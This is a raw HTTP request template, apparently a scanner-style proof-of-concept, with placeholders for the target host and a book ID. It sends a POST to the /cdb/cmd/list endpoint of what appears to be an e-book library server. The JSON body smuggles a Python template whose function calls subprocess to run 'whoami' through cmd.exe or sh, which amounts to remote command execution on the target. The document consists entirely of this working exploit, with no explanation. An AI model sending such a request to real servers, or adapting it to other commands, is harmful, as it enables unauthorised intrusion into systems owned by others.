POST /cdb/cmd/list HTTP/1.1
Host: {{HOST}}
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.1108.43 Safari/537.36 Edg/100.0.1108.43
Connection: close
Content-Length: 270
Content-Type: application/json

[
    ["template"],
    "",
    "",
    "",
    {{BOOK_ID}},
   "python:def evaluate(a, b):\n  import subprocess\n  try:\n    return subprocess.check_output(['cmd.exe', '/c', 'whoami'])\n  except Exception:\n    return subprocess.check_output(['sh', '-c', 'whoami'])\n"
]
